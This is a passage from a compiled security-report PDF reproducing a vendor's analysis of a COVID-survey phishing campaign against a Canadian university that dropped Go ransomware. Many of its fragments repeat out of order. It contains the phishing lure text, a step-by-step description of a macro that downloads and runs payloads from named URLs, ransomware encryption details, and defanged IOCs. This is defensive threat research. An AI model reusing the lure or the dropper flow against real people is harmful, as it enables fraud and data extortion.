malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2559 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2560 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2561 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2562 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2563 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2564 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2565 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2566 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2567 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2568 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2569 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2570 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2571 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2572 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2573 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2574 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2575 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2576 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2577 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2578 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2579 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2580 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2581 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2582 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2583 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2584 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2585 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2586 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2587 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2588 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2589 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2590 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2591 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2592 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with 